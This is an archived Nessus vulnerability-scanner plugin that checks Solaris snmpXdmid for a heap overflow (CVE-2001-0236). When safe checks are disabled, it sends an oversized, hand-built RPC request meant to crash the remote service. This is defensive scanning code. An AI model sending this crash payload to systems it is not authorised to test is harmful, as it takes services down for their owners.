home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / snmpXdmid.nasl

< prev

next >

Wrap

Text File  |  2005-03-31  |  3KB  |  107 lines

---

1. #
2. # This script is released under the GPL
3. #
4.  
5. if(description)
6. {
7.  script_id(10659);
8.  script_bugtraq_id(2417);
9.  script_version ("$Revision: 1.15 $");
10.  script_cve_id("CVE-2001-0236");
11.  
12.  name["english"] = "snmpXdmid overflow";
13.  name["francais"] = "snmpXdmid overflow";
14.  
15.  script_name(english:name["english"],
16.           francais:name["francais"]);
17.  
18.  desc["english"] = "
19. The remote RPC service 100249 (snmpXdmid) is vulnerable
20. to a heap overflow which allows any user to obtain a root
21. shell on this host.
22.  
23. Solution : disable this service (/etc/init.d/init.dmi stop) if you don't use
24. it, or contact Sun for a patch
25. Risk factor : High";
26.  
27.  script_description(english:desc["english"]);
28.  
29.  summary["english"] = "heap overflow through snmpXdmid";
30.  script_summary(english:summary["english"]);
31.  
32.  script_category(ACT_MIXED_ATTACK); # mixed
33.  
34.  script_copyright(english:"This script is Copyright (C) 2001 Intranode");
35.  family["english"] = "Gain root remotely";
36.  family["francais"] = "Passer root α distance";
37.  script_family(english:family["english"], francais:family["francais"]);
38.  script_dependencies("rpc_portmap.nasl");
39.  script_require_keys("rpc/portmap");
40.  
41.  exit(0);
42. }
43.  
44. include("misc_func.inc");
45. include("global_settings.inc");
46.  
47.  
48. port = get_rpc_port(program:100249, protocol:IPPROTO_TCP);
49. if(port)
50. {
51.   if(safe_checks())
52.   {
53.    if ( report_paranoia == 0 ) exit(0);
54.   data = " 
55. The remote RPC service 100249 (snmpXdmid) may be vulnerable
56. to a heap overflow which allows any user to obtain a root
57. shell on this host.
58.  
59. *** Nessus reports this vulnerability using only
60. *** information that was gathered. Use caution
61. *** when testing without safe checks enabled.
62.  
63. Solution : disable this service (/etc/init.d/init.dmi stop) if you don't use
64. it, or contact Sun for a patch
65. Risk factor : High";
66.   security_hole(port:port, data:data);
67.   exit(0);
68.   }
69.   
70.   
71.   if(get_port_state(port))
72.   {
73.    soc = open_sock_tcp(port);
74.    if(soc)
75.    {
76.     #
77.     # We forge a bogus RPC request, with a way too long
78.     # argument. The remote process will die immediately,
79.     # and hopefully painlessly.
80.     #
81.     req = raw_string(0x00, 0x00, 0x0F, 0x9C, 0x22, 0x7D,
82.             0x93, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
83.           0x00, 0x02, 0x00, 0x01, 0x87, 0x99, 0x00, 0x00,
84.           0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,
85.           0x00, 0x01, 0x00, 0x00, 0x00, 0x20, 0x3A, 0xF1, 
86.           0x28, 0x90, 0x00, 0x00, 0x00, 0x09, 0x6C, 0x6F,
87.           0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x00,
88.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
89.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
90.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
91.           0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
92.           0x00, 0x01, 0x00, 0x00, 0x06, 0x44, 0x00, 0x00,
93.           0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00) +
94.           crap(length:28000, data:raw_string(0x00));
95.  
96.  
97.      send(socket:soc, data:req);
98.      r = recv(socket:soc, length:4096);
99.      close(soc);
100.      sleep(1);
101.      soc2 = open_sock_tcp(port);
102.      if(!soc2)security_hole(port);
103.      else close(soc2);
104.    }
105.  }
106. }
107.